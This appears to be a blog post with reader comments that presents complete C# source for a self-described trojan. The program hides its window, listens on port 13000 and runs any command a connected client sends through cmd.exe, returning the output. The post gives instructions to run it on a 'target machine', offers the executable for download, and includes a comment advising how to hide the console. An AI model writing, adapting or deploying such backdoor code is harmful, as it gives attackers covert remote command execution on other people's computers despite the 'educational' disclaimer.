The trojan runs in the background, opens a listening port on the machine running it and allows any connected client to execute remote shell commands.
This application is for educational purposes only (mostly my own).
how to use it?
Simply run the trojan on the target machine and connect to it through port 13000 using telnet or netcat. After the connection had established, you may execute any shell command on the target machine:
code:
[STAThread]
static void Main()
{
ProcessStartInfo processInfo;
Process process;
TcpListener server = null;
bool isFirst = true;
try
{
// Set the TcpListener on port 13000.
Int32 port = 13000;
// Set the server to run locally
IPAddress localAddr = IPAddress.Parse("127.0.0.1");
server = new TcpListener(localAddr, port);
// Start listening for client requests.
server.Start();
// Buffer for reading data
Byte[] bytes = new Byte[256];
String command = null;
int i;
string recv_char;
byte[] msg;
// Perform a blocking call to accept requests.
TcpClient client = server.AcceptTcpClient();
// Get a stream object for reading and writing
NetworkStream stream = client.GetStream();
// Say hello
msg = System.Text.Encoding.ASCII.GetBytes("Welcome Master! enter a command to execute or enter exit:\r\n");
stream.Write(msg, 0, msg.Length);
// Enter the listening loop.
while (true)
{
if (!isFirst)
{
msg = System.Text.Encoding.ASCII.GetBytes("Enter a command:\r\n");
stream.Write(msg, 0, msg.Length);
}
// reset the command
command = null;
// Loop to receive all the data sent by the client.
while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
{
// Translate data bytes to a ASCII string.
recv_char = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
command += recv_char;
if (command.Contains("\n"))
break;
}
if (command.Equals("exit\r\n"))
{
// If exit entered shutdown and end connection
msg = System.Text.Encoding.ASCII.GetBytes("Bye Bye Master...\r\n");
stream.Write(msg, 0, msg.Length);
client.Close();
break;
}
// execute the command received (/C to terminate process after execution):
processInfo = new ProcessStartInfo("cmd.exe", "/C " + command);
processInfo.CreateNoWindow = true; // don't open a window
processInfo.RedirectStandardOutput = true; // don't show output
processInfo.UseShellExecute = false; // don't use a shell
process = Process.Start(processInfo); // start the process
string output = process.StandardOutput.ReadToEnd();
process.Close(); // close the process
isFirst = false;
if (output != null)
{
msg = System.Text.Encoding.ASCII.GetBytes(output + "\n");
// Send back a response.
stream.Write(msg, 0, msg.Length);
}
else
{
msg = System.Text.Encoding.ASCII.GetBytes("Sorry Master, command execution failed\r\n");
// Send back a response.
stream.Write(msg, 0, msg.Length);
}
}
}
catch
{
// do nothing
}
finally
{
// Stop listening for new clients.
server.Stop();
}
}
You may download the executable file from here.Oh.. and don't forget to kill that process when you finish playing with it :)
-herzel
סוס נחמד. רק שכל קוד ב-NET. אפשר לראות בעזרת Reflector.
ReplyDeletethanx! I wrote this code just to demonstrate how a simple trojan is written in C#. I don't think its smart to write malware in .NET.
ReplyDeletelet me rephrase that, I don't think its smart to write malware at all :)
ReplyDeleteHow do you make the console application invisible??
ReplyDeletefreeconsole() ;D
Deletehey in this given program the issue is that after executing the command the cmd is closed. what if i want to execute a sequence of commands which require the output of previous commands like directory traversal cd command ??
Delete